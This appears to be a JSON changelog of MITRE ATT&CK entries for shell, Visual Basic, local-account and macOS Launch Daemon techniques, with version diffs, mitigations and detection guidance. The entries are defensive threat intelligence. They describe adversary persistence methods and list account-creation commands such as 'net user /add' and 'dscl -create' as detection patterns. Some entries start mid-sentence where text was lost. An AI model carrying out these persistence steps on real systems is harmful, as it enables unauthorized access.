"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-05-28 14:56:23.748000+00:00\", \"old_value\": \"2020-06-24 13:51:22.360000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1026: Privileged Account Management",
"M1042: Disable or Remove Feature or Program",
"M1045: Code Signing",
"M1049: Antivirus/Antimalware"
],
"new": [
"M1038: Execution Prevention"
],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0011: Module (Module Load)",
"DS0012: Script (Script Execution)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-03-09 14:15:05.330000+00:00",
"modified": "2021-07-26 22:34:43.261000+00:00",
"name": "Unix Shell",
"description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1059/004",
"external_id": "T1059.004"
},
{
"source_name": "DieNet Bash",
"description": "die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020.",
"url": "https://linux.die.net/man/1/bash"
},
{
"source_name": "Apple ZShell",
"description": "Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020.",
"url": "https://support.apple.com/HT208050"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Process: Process Creation"
],
"x_mitre_detection": "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"root"
],
"x_mitre_platforms": [
"macOS",
"Linux"
],
"x_mitre_remote_support": true,
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": true}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-07-26 22:34:43.261000+00:00\", \"old_value\": \"2020-06-15 16:55:44.483000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1038: Execution Prevention"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-03-09 14:29:51.508000+00:00",
"modified": "2021-08-16 21:03:21.051000+00:00",
"name": "Visual Basic",
"description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1059/005",
"external_id": "T1059.005"
},
{
"source_name": "VB .NET Mar 2020",
"description": ".NET Team. (2020, March 11). Visual Basic support planned for .NET 5.0. Retrieved June 23, 2020.",
"url": "https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/"
},
{
"source_name": "VB Microsoft",
"description": "Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.",
"url": "https://docs.microsoft.com/dotnet/visual-basic/"
},
{
"source_name": "Microsoft VBA",
"description": "Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.",
"url": "https://docs.microsoft.com/office/vba/api/overview/"
},
{
"source_name": "Wikipedia VBA",
"description": "Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.",
"url": "https://en.wikipedia.org/wiki/Visual_Basic_for_Applications"
},
{
"source_name": "Microsoft VBScript",
"description": "Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.",
"url": "https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Process: Process Creation",
"Module: Module Load",
"Script: Script Execution"
],
"x_mitre_detection": "Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM"
],
"x_mitre_platforms": [
"Windows",
"macOS",
"Linux"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-16 21:03:21.051000+00:00\", \"old_value\": \"2020-08-13 20:09:39.122000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"changelog_mitigations": {
"shared": [
"M1021: Restrict Web-Based Content",
"M1038: Execution Prevention",
"M1042: Disable or Remove Feature or Program",
"M1049: Antivirus/Antimalware"
],
"new": [
"M1040: Behavior Prevention on Endpoint"
],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (Process Creation)",
"DS0011: Module (Module Load)",
"DS0012: Script (Script Execution)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-03-09 14:12:31.196000+00:00",
"modified": "2021-07-26 17:13:07.345000+00:00",
"name": "Windows Command Shell",
"description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1059/003",
"external_id": "T1059.003"
},
{
"source_name": "SSH in Windows",
"description": "Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal. Retrieved July 26, 2021.",
"url": "https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Process: Process Creation"
],
"x_mitre_detection": "Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_remote_support": true,
"x_mitre_version": "1.2",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_remote_support']\": true}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-07-26 17:13:07.345000+00:00\", \"old_value\": \"2021-04-14 15:36:02.195000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\\n\\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\\n\\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.\", \"old_value\": \"Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. \\n\\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\\n\\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1,4 @@\\n-Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. \\n+Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\\n \\n Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\\n \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['external_references'][1]\": {\"source_name\": \"SSH in Windows\", \"description\": \"Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal. Retrieved July 26, 2021.\", \"url\": \"https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh\"}}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse the Windows command shell for executio | t | 1 | Adversaries may abuse the Windows command shell for executio |
| > | n. The Windows command shell ([cmd](https://attack.mitre.org | > | n. The Windows command shell ([cmd](https://attack.mitre.org | ||
| > | /software/S0106)) is the primary command prompt on Windows s | > | /software/S0106)) is the primary command prompt on Windows s | ||
| > | ystems. The Windows command prompt can be used to control al | > | ystems. The Windows command prompt can be used to control al | ||
| > | most any aspect of a system, with various permission levels | > | most any aspect of a system, with various permission levels | ||
| > | required for different subsets of commands. Batch files (e | > | required for different subsets of commands. The command prom | ||
| > | x: .bat or .cmd) also provide the shell with a list of seque | > | pt can be invoked remotely via [Remote Services](https://att | ||
| > | ntial commands to run, as well as normal scripting operation | > | ack.mitre.org/techniques/T1021) such as [SSH](https://attack | ||
| > | s such as conditionals and loops. Common uses of batch files | > | .mitre.org/techniques/T1021/004).(Citation: SSH in Windows) | ||
| > | include long or repetitive tasks, or the need to run the sa | > | Batch files (ex: .bat or .cmd) also provide the shell with | ||
| > | me set of commands on multiple systems. Adversaries may lev | > | a list of sequential commands to run, as well as normal scri | ||
| > | erage [cmd](https://attack.mitre.org/software/S0106) to exec | > | pting operations such as conditionals and loops. Common uses | ||
| > | ute various commands and payloads. Common uses include [cmd] | > | of batch files include long or repetitive tasks, or the nee | ||
| > | (https://attack.mitre.org/software/S0106) to execute a singl | > | d to run the same set of commands on multiple systems. Adve | ||
| > | e command, or abusing [cmd](https://attack.mitre.org/softwar | > | rsaries may leverage [cmd](https://attack.mitre.org/software | ||
| > | e/S0106) interactively with input and output forwarded over | > | /S0106) to execute various commands and payloads. Common use | ||
| > | a command and control channel. | > | s include [cmd](https://attack.mitre.org/software/S0106) to | ||
| > | execute a single command, or abusing [cmd](https://attack.mi | ||||
| > | tre.org/software/S0106) interactively with input and output | ||||
| > | forwarded over a command and control channel. |
net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account.\n\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1136/001",
"external_id": "T1136.001"
},
{
"source_name": "Microsoft User Creation Event",
"description": "Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account was created. Retrieved June 30, 2017.",
"url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"User Account: User Account Creation",
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-12 13:04:14.248000+00:00\", \"old_value\": \"2020-03-23 18:04:20.780000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account.\\n\\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\", \"old_value\": \"Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account.\\n\\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account.\\n+Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account.\\n \\n Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.\", \"old_value\": \"Monitor for processes and command-line parameters associated with local account creation, such as net user /add or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may create a local account to maintain access to | t | 1 | Adversaries may create a local account to maintain access to |
| > | victim systems. Local accounts are those configured by an o | > | victim systems. Local accounts are those configured by an o | ||
| > | rganization for use by users, remote support, services, or f | > | rganization for use by users, remote support, services, or f | ||
| > | or administration on a single system or service. With a suff | > | or administration on a single system or service. With a suff | ||
| > | icient level of access, the <code>net user /add</code> comma | > | icient level of access, the <code>net user /add</code> comma | ||
| > | nd can be used to create a local account. Such accounts may | > | nd can be used to create a local account. On macOS systems t | ||
| > | be used to establish secondary credentialed access that do | > | he <code>dscl -create</code> command can be used to create a | ||
| > | not require persistent remote access tools to be deployed on | > | local account. Such accounts may be used to establish seco | ||
| > | the system. | > | ndary credentialed access that do not require persistent rem | ||
| > | ote access tools to be deployed on the system. |
/System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)\n\nAdversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)\n\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1543/004",
"external_id": "T1543.004"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/550.html",
"external_id": "CAPEC-550"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/551.html",
"external_id": "CAPEC-551"
},
{
"source_name": "AppleDocs Launch Agent Daemons",
"description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.",
"url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"
},
{
"source_name": "Methods of Mac Malware Persistence",
"description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.",
"url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"
},
{
"source_name": "launchd Keywords for plists",
"description": "Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.",
"url": "https://www.real-world-systems.com/docs/launchdPlist.1.html"
},
{
"source_name": "WireLurker",
"description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.",
"url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
},
{
"source_name": "OSX Malware Detection",
"description": "Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.",
"url": "https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf"
},
{
"source_name": "LaunchDaemon Hijacking",
"description": "Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege escalation and persistence via insecure folder permissions. Retrieved July 26, 2021.",
"url": "https://bradleyjkemp.dev/post/launchdaemon-hijacking/"
},
{
"source_name": "sentinelone macos persist Jun 2019",
"description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.",
"url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"File: File Creation",
"File: File Modification",
"Process: Process Creation",
"Command: Command Execution",
"Service: Service Creation",
"Service: Service Modification"
],
"x_mitre_detection": "Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.\n\nSome legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the RunAtLoad parameter set to true, ensure the Program parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as Program and ProgramArguments parameters but one must be present.(Citation: launchd Keywords for plists)\n\n",
"x_mitre_effective_permissions": [
"root",
"Administrator"
],
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator"
],
"x_mitre_platforms": [
"macOS"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-07 22:10:55.653000+00:00\", \"old_value\": \"2020-09-16 15:46:44.130000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)\\n\\nAdversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)\\n\\nAdditionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)\", \"old_value\": \"Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple\\u2019s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). \\n\\nAdversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root. \\n\\nThe plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon\\u2019s executable and gain persistence or Privilege Escalation. \", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n-Adversaries may create or modify launch daemons to repeatedly execute malicious payloads as part of persistence. Per Apple\\u2019s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence). \\n+Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)\\n \\n-Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root. \\n+Adversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)\\n \\n-The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon\\u2019s executable and gain persistence or Privilege Escalation. \\n+Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)\"}, \"root['external_references'][5]['source_name']\": {\"new_value\": \"launchd Keywords for plists\", \"old_value\": \"OSX Malware Detection\"}, \"root['external_references'][5]['description']\": {\"new_value\": \"Dennis German. (2020, November 20). launchd Keywords for plists. Retrieved October 7, 2021.\", \"old_value\": \"Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017.\"}, \"root['external_references'][5]['url']\": {\"new_value\": \"https://www.real-world-systems.com/docs/launchdPlist.1.html\", \"old_value\": \"https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor for new files added to the /Library/LaunchDaemons/ folder. The System LaunchDaemons are protected by SIP.\\n\\nSome 